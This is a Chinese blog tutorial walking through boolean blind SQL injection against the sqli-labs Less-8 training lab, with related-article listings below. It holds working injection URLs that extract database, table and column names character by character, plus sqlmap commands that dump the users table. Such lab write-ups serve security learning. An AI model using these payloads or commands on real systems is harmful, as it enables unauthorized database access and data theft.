sql盲注

最新推荐文章于 2024-04-23 09:08:55 发布
最新推荐文章于 2024-04-23 09:08:55 发布
阅读量7.3k 收藏 4
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55710577/article/details/124056911
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

sql注入--盲注

前言

靶场环境:sqli-labs-master 第8关
注入攻击的本质:把用户的输入当作代码执行。
其中存在两个关键条件:
(1)用户可以控制输入。
(2)用户的输入被拼接到原代码上被执行。

提示:以下是本篇文章正文内容,下面案例可供参考

一、什么是盲注

所谓盲注便是在服务器没有错误回显的时候完成的注入攻击。sql盲注主要分为三类,分别是布尔盲注、延时盲注(也叫时间盲注)、报错盲注。

二、步骤示例

1.测试注入点


http://192.168.159.130/sqli-labs-master/Less-8/?id=1' and 1=2 --+
#id 处存在注入点

2.测所在数据库长度

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (length(database()))=8 --+

3. 利用ASCII码猜当前数据库名

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr(database(),1,1)))=115 --+

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr(database(),2,1)))=101 --+

以此类推,可以通过ASCII码所对应的值得到数据库名。

4.利用ASCII码查询表名

具体查询过程跟查数据库名基本一样

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101 --+

过程跟上述命令类似,只是有少许不同,相关的一些命令会在后面给出

5、利用ASCII码查询字段名

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)))=105 --+

sql手注所用到的函数总结

length() #返回字符串的长度
substr() #截取字符串 (语法:substr(str,pos,len);ascii()  #反回字符的ascii码

如上所述,利用手注进行盲注非常麻烦,因此我们可以利用工具进行sql注入

sqlmap进行sql盲注

1.寻找注入点,

sqlmap -u  192.168.159.130/sqli-labs-master/Less-8/?id=1

请添加图片描述
由图中可以看出,sql注入类型为bool盲注
2、查库名

sqlmap -u 192.168.159.130/sqli-labs-master/Less-8/?id=1 --current-db

请添加图片描述
3、查表名

sqlmap -u 192.168.159.130/sqli-labs-master/Less-8/?id=1 -D security --tables

请添加图片描述
4、查字段名

sqlmap -u 192.168.159.130/sqli-labs-master/Less-8/?id=1 -D security -T users --dump

请添加图片描述

吃泡面不喝汤
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Web安全:SQL注入之布尔盲注原理+步骤+实战操作
wangyuxiang946的博客
05-13 2192
这篇文章为大家解析布尔盲注实现原理,结合实战案例讲解布尔盲注使用步骤
sql手工注入实战
mulincong的博客
05-30 2229
sql手工注入封神台靶场
SQl盲注原理及其简单演示
weixin_64066158的博客
05-02 2240
首先说下Sql盲注Sql注入的区别: 盲注:获得不了过多的信息,没有详细内容; 普通注入:可以通过较为详细的内容来分析; 盲注概述:在sql注入过程中,SQL语句执行查询后,查询数据不能回显到前端页面中,我们需要使用一些特殊的方式来判断或者尝试,这个过程称为盲注盲注一般分为三种: 布尔盲注:页面只返回对或者错,存在或者不存在来判断 基于时间的盲注:通过页面沉睡时间来判断 报错的盲注:输入特定的语句使页面报错,网页回输出相关的错误信息;从而是我们想要的基本信息; 今天主要讲布尔盲注
SQL注入2——盲注(重学)
qq_52263650的博客
11-07 3771
SQL注入2——布尔型盲注(重学)
sql注入(盲注
最新发布
2302_79119987的博客
04-23 1469
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
Sql盲注与普通注入的区别
热门推荐
过客璇璇的博客
03-12 3万+
Sql盲注与普通注入的区别 在学习sql注入的时候,好多同学都是不弄清楚原理,去浏览器上狂搜一下注入语句,就开始对老师给的靶机注入,虽然能注入成功,但是不清楚原理,对以后的学习和工作没有多大的好处。现在我就讲一下sql盲注与普通注入的区别! 首先,何为sql盲注?可能这个问题一下子就把你问蒙蔽了。 盲注就是在sql注入过程中,sql语句执行的选择后,选择的...
python编写的sql盲注
10-28
python编写的sql盲注
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
布尔盲注.py_sql盲注python_
10-03
在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,它显然是用于演示或执行SQL盲注的工具。 在SQL盲注中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
SQL盲注medium.pdf
05-13
SQL盲注medium.pdf 本文档主要讲解SQL盲注的技术,使用DVWA Security平台进行演示,难度设置为medium。下面我们将对每一步操作进行详细的解释和知识点总结。 一、DVWA Security平台的使用 DVWA Security是一个...
一个蛋疼强的的注入字典
05-02
#字典里面包含那些东西呢 1,收集了cgi的那些东东 2,加入了一些linux的东东 3,加入了最近网上出现的一些漏洞页面路径 4,把普瑞斯特牛以前发的后台字典增强了一下 5.增加了xxs相关的东西 6.asp 那些默认数据库当然也在里面 7,fcedit,edit那些啥编辑后台的一些漏洞文件啥都在里面 8.那些常用的注入工具,扫描后台的工具啥的字典里面的东东全部在字典里面躺着 #字典不足支持 1,还有一些字典没有整理,在我电脑躺着 2,涵盖的东西还不是很全面 # 在win下建议把字典加入wwwscan linux下用啥呢。我也不知道哦 #end .. 还有几份字典没处理,实在是没那个力气搞了。
多线程+二分法的巧用——通达OA SQL盲注1
08-03
【多线程+二分法在SQL盲注中的应用——以通达OA为例】 SQL盲注SQL Blind Injection)是一种常见的网络安全漏洞,攻击者通过发送特定的SQL查询,利用服务器的响应时间或状态来推断数据库的信息。在这个案例中,...
13、SQL注入——SQL盲注
qq_55202378的博客
12-05 293
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时还需要利用一些方法进行判断或尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能时页面内容的不同,也可能时响应时间的不同)。一般情况下,盲注可分为两种:基于布尔的盲注某些情况下,页面返回的结果只要两种(正常或者错误)。通过构造SQL判断语句,查看页面的返回结果(True 或False)来判断哪些SQL判断条件成立,通过此来获取数据库中的数据。基于时间的盲注
SQL Injection (Blind)之盲注(原理、分类、利用)
Innocence_0的博客
03-06 1238
SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响 应时间不同)。一般情况下,盲注可分为两类:基于布尔的盲注(Boolean based)基于时间的盲注(Time based)
SQL注入(盲注)
a12332251的博客
12-07 917
SQL
布尔类型的SQL盲注注入
m0_64368365的博客
02-20 1431
布尔盲注适用于无回显的情况,只有通过true或false及页面是否正常来判断所输入内容是否正确。
Sql注入(手工注入思路、绕过、防御)
Naive的博客
09-26 2414
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
SQL注入之布尔盲注和联合注入查询
m0_73303597的博客
11-23 318
自用
dvwa sql盲注高级
08-11
DVWA(Damn Vulnerable Web Application)是一个用于练习 Web 安全技术的漏洞应用程序。其中包含了多个不同类型的漏洞,包括 SQL 盲注SQL 盲注是一种利用 Web 应用程序中存在的 SQL 注入漏洞来获取数据库信息的攻击技术。在 DVWA 中,你可以通过以下步骤进行 SQL 盲注的高级练习: 1. 登录 DVWA:在浏览器中访问 DVWA,并使用提供的用户名和密码登录。 2. 寻找 SQL 注入点:在 DVWA 中,你需要找到存在 SQL 注入漏洞的输入点。这可以是登录表单、搜索框或其他用户输入的地方。 3. 确定数据库和表名:使用不正确的输入来尝试触发错误,并尝试从错误消息中获取有关数据库和表名的信息。这可以帮助你构建有效的注入语句。 4. 构造注入语句:根据你获取到的数据库和表名信息,构造有效的注入语句。在高级盲注中,你可能需要使用一些技巧来绕过过滤和限制。 5. 判断注入结果:通过观察应用程序的响应,判断你的注入语句是否成功执行。你可以观察页面内容、错误消息或应用程序的行为变化。 6. 提取数据:如果注入成功执行,你可以使用 UNION SELECT 或其他技术来提取数据库中的数据。通过逐渐调整注入语句,你可以获取更多敏感信息。 请注意,在进行 DVWA 或任何其他漏洞练习时,遵守法律和道德规范。仅在授权的环境中进行测试,不要攻击未经授权的系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃泡面不喝汤

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值